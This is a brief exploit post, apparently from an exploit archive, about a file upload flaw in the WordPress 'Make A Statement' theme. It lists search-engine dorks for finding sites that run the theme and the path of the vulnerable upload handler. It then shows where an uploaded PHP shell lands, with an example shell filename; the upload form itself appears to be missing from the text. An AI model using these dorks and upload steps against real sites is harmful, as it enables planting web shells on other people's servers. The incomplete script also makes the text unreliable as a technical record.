WordPress Make A Statement (MaS) Theme – CSRF Vulnerability

#Vulnerabillity : CSRF

#Dork :

inurl:wp-content/themes/make_a_statement
inurl:wp-content/themes/make_a_statement_v1

CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/make_a_statement/library/includes/upload-handler.php

Script :


Your File:


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php